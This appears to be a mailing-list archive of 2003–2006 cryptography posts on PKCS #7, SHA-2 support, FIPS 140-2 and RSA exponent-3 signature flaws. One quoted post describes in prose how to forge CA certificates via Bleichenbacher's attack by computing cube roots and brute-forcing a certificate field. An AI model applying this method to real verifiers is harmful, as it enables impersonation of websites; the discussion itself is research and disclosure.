RE: OpenSSL PKCS #7 supports AES SHA-2 ?

2006-10-13 Thread Tolga Acar
Read RFC4055 for RSA with various hashes, OAEP, and PSS combinations.

- Tolga

 -Original Message-
 [mailto:[EMAIL PROTECTED] On Behalf Of Alex Alten
 Sent: Tuesday, October 10, 2006 9:47 AM
 To: Russ Housley;
 Subject: Re: OpenSSL PKCS #7 supports AES  SHA-2 ?
 OK.  I found SHA-2 in RFC 4634 (only 3 months old), which 
 refers back to FIPS 180-2.
 But I reach a dead-end with PKCS #7 (now RFC 3852).  There's 
 no support for
 algorithm types (RFC 3279). Also PKCS #1 (now RFC 3447) needs 
 an update for
 SHA-2 with RSA encryption (OIDs, etc.).
 Did I miss something or do you need help in updating these, 
 since I, and probably others too, need them?
 - Alex
 At 01:19 PM 10/9/2006 -0400, Russ Housley wrote:
 PKCS#7 has been turned over to the IETF for maintenance.  The most 
 recent version is RFC 3852.  Since the protocol is more 
 stable than the 
 cryptographic algorithms, the algorithm discussion appear in 
 separate RFCs.
 TLS 1.2 is under development in the IETF.  It is being done 
 in such a 
 way that none of the ciphersuites that have already been 
 defined need 
 to be updated, including the ones that use AES and the SHA-2 family.
 At 01:28 AM 10/7/2006, Alex Alten wrote:
 After reading PKCS #1 v2 more closely and SHA-2 is not even in the 
 specs, therefore OpenSSL PKCS #7 functions won't support 
 SHA-2.  This 
 spec was last updated in 1998.
 PKCS Editor, is there a new update in progress by RSA Labs to 
 SHA-2 and AES?
 Does OpenSSL implement PKCS #1 v2 or just v1.5?  If the latter then 
 not even
 SHA-1 is supported.
 PKCS editor, is there any timeline as to when PKCS #7 will then be 
 updated with references to official OIDs, etc., for 
 specifying SHA-2 and AES?
 Dr. Ron Rivest, are you going to publish new message-digest 
 and SHA-2?  (So that they can be referenced by an updated PKCS #7.)
 Mr. Russ Housley, can you weigh in with what happening in 
 the IETF WG 
 security area?  I know that Mr. Eric Rescorla is working on 
 a new TLS 
 v1.2 draft.  Will this be done/ratified soon?  I assume 
 OpenSSL will 
 incorporate this soon thereafter?
 This mess with the MD5 and SHA-1 hashes is really starting 
 to becoming 
 a problem.
 It's certainly impacting new development projects/products I'm 
 involved with using SSL and PKI certificates.  My customers are 
 concerned about using MD5 and SHA-1, and they don't want to keep 
 paying for implementations repeatedly as the standards catch up to 
 reality.  Updating these various heavily used standards quickly is 
 quite important.
 Sincerely (and thanks in advance for all of your replies),
 - Alex
 At 09:05 AM 10/6/2006 -0700, Alex Alten wrote:
 Does anyone know if the OpenSSL PKCS #7 functions support 
 AES and SHA-2?
 (I assuming OpenSSL 0.9.7 or later.)
 - Alex
 Alex Alten
 Alten Security Engineering, Inc.
 The Cryptography Mailing List
 Unsubscribe by sending unsubscribe cryptography to 

The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]

RE: Exponent 3 damage spreads...

2006-09-21 Thread Tolga Acar

Here is what I compute in Maple.
I wonder if you are running into an old BC bug. I don't remember the
details, but bc had a bug some 10 years or so ago with big numbers.



 c:=s^3 mod m:


 c2:=m^3 mod s:



 -Original Message-
 [mailto:[EMAIL PROTECTED] On Behalf Of Anton Stiglic
 Sent: Tuesday, September 19, 2006 8:56 PM
 Cc: 'Anton Stiglic'
 Subject: RE: Exponent 3 damage spreads...
 I tried coming up with my own forged signature that could be 
 validated with OpenSSL (which I intended to use to test other 
 libraries).  I haven't succeeded, either because in the 
 particular example I came up with OpenSSL does something that 
 catches the invalid signature, or I messed up somewhere (the 
 likelihood of which is far from negligible).  Unfortunately, 
 I don't have much more time to play with this.  I decided to 
 share the methodology I used with those of you who are 
 interested in case the info is helpful to anyone, or someone 
 can tell me why the signature I produced doesn't get 
 validated by OpenSSL.
 I followed the instructions of Hal Finney's excellent post:
 I started out by generating 3072 RSA key pair, with public 
 exponent e = 3.
 openssl genrsa -des3 -3 -out my.key 3072
 the resulting key can be found bellow, the passwords is 
 test if you ever want to use it.
 Then I created the corresponding public key certificate:
 openssl req -new -x509 -days 1001 -key my.key -out my.cer
 The public key certificate can be found bellow as well.  You 
 can import this in 

RE: Real World Exploit for Bleichenbachers Attack on SSL fromCrypto'06 working

2006-09-15 Thread Tolga Acar
You need to have one zero octet after bunch of FFs and before DER encoded
has blob in order to have a proper PKCS#1v1.5 signature encoding.

Based on what you say below, I used this cert and my key to sign an
end-entity certificate which I used to set up an webserver, it appears that
implementations you used don't check for this one zero octet, either.

- Tolga 

 -Original Message-
 [mailto:[EMAIL PROTECTED] On Behalf Of Erik Tews
 Sent: Thursday, September 14, 2006 3:40 PM
 To: Cryptography
 Subject: Real World Exploit for Bleichenbachers Attack on SSL 
 fromCrypto'06 working
 I had an idea very similar to the one Peter Gutmann had this 
 morning. I managed to write a real world exploit which takes as input:
   * an CA-Certificate using 1024 Bit RSA and Exponent 3 (ca-in)
   * a Public Key, using an algorithm and size of your choice
 and generats an CA-Certificate signed by ca-in, using public 
 key key-in.
 At least 3 major webbrowsers on the marked are shipped by 
 default with CA certificates, which have signed other 
 intermediate CAs which use
 rsa1024 with exponent 3, in their current version. With this 
 exploit, you can now sign arbitary server certificates for 
 any website of your choice, which are accepted by all 3 
 webbrowsers without any kind of ssl-warning-message.
 I used the following method:
 I first generated a certificate, with BasicConstraints set to 
 True, Public Key set to one of my keys, and Issuer to the DN 
 of a CA using
 1024 Bit RSA with Exponent 3. I used usual values for all the 
 other fields. When I signed a Certificate I shiftet all my 
 data to the left. I had 46 bytes of fixed valued (this can 
 perhaps be reduced to 45 bytes, I have not checked yet, but 
 even with 46, this attack works). They had the form 00 01 FF 
 FF FF FF FF FF FF FF ASN1DataWithHash. This gives me 82 bytes 
 I can fill with arbitary values (at least, if the 
 implementations skipps some part of the asn1-data, I can 
 choose some bytes there too).
 If you now set all the bytes right of your ASN1DataWithHash 
 to 00, and interpret that as a number n, and compute:
y = (ceil(cubeRoot(n)))^3
Where ceil means rounding to the next bigger natural 
 number and cubeRoot
  computes the third Root in R.
 y will be a perfect cube and have the form:
 00 01 FF FF FF FF FF FF FF FF ASN1DataWithHash' Garbage
 and ASN1DataWithHash' looks quite similar to your original 
 ASN1DataWithHash, with perhaps 2-3 rightmost bytes changed. 
 These bytes are part of the certificate hash value.
 This signature is useless, because every certificate has a 
 fixed hash value. But you don't need to sign a fixed 
 certificate. So i started adding some seconds to the notAfter 
 value of the certificate and computed the hash again. I brute 
 forced until I had a certificate where the computation of y 
 did not alter any bytes of the ASN1DataWithHash.
 I had to try 275992 different values which took 2-3 minutes 
 on my 1.7 GHz Pentium using an unoptimized java-implementation.
 I used this cert and my key to sign an end-entity certificate 
 which I used to set up an webserver.
 I have to check some legal aspects before publishing the 
 names of the browser which accepted this certificate and the 
 name of the ca-certificates with exponent 3 I used in some 
 hours, if nobody tells me not to do that. Depending on the 
 advice I get, I will release the sourcecode of the exploit too.
 Thanks go to Alexander May and Ralf-Philipp Weinmann who helped me.

The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]

RE: RSA Implementation in C language

2004-12-01 Thread Tolga Acar
Try Intel's open-sourced CDSA, available at SourceForge.

- Tolga

 -Original Message-
 From: [EMAIL PROTECTED] [mailto:owner-
 [EMAIL PROTECTED] On Behalf Of Trei, Peter
 Sent: Tuesday, November 30, 2004 7:16
 Subject: RE: RSA Implementation in C language
 Admittedly somewhat old and creaky, but try Googling
 RSAREF. I don't know where that stands for IP rights
 (presumably we still have copyright), bout for
 research it's a startin point.
  -Original Message-
  [mailto:[EMAIL PROTECTED] Behalf Of Sandeep N
  Sent: Monday, November 29, 2004 3:17 AM
  Subject: RSA Implementation in C language
  Can anybody tell me where I can get an implementation of RSA
  algorithm in C language? I searched for it, but could not locate one.
  I would be grateful to you if you could give me the location of the
  source code.
  Thanks and Regards,
  The Cryptography Mailing List
  Unsubscribe by sending unsubscribe cryptography to
 The Cryptography Mailing List
 Unsubscribe by sending unsubscribe cryptography to

The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]

Re: OpenSSL *source* to get FIPS 140-2 Level 1 certification

2003-09-08 Thread Tolga Acar
On a second thought, that there is no key management algorithm 
certified, how would one set up a SSL connection in FIPS mode?

It seems to me that, it is not possible to have a FIPS 140 certified 
SSL/TLS session using the OpenSSL's certification.

- Tolga

The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]

Re: OpenSSL *source* to get FIPS 140-2 Level 1 certification

2003-09-06 Thread Tolga Acar
Joshua Hill wrote:

On Fri, Sep 05, 2003 at 04:05:07PM -0400, Rich Salz wrote:

It is the first *source code* certification.

The ability to do this runs counter to my understanding of FIPS 140-2.

. and to experiences with the previous FIPS 140-1 certifications I was 
involved in, including a fairly recent communication from NIST that 
defines a crypto module: it is not a statically linked library, and 
that it ought to be an executable or a shared library (so,dll).

Second, it is unclear to me what would be tested during operational
testing.  The source code can't itself be a module, because the source
code doesn't do anything until it is compiled and run. FIPS 140-2
currently only allows for fully functional units to be modules; you'll
note, for instance, that FIPS certs for software modules are listed as
a multi-chip standalone embodiment, for instance.  NIST was talking
about producing documents that would support a true software only
embodiment, but that initiative seems to have stalled with the change
of directors of the CMVP (the NIST group that issues FIPS 140-2 certs).
Can you say that the C/asm source code is the code that constitutes a 
module, and define compiler/linker/OS/CPU as your execution 
environment for FIPS 140 purposes? Think Java, for instance.
I realize this is stretching too thin. and can think of lots of reasons 
why it can't be. But...

Third, nominally, the FIPS certificate only applies to the particular
operating system (and OS version) that the operational testing was
done on.  For level 1 modules, NIST has historically allowed OSes in
the same family to also be covered, and they have been very liberal
in their definition of family.
I have seen evidences that this restriction has become exceptionally 
loose, and that the family can be as broad as UNIX-like systems...

- Tolga

The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]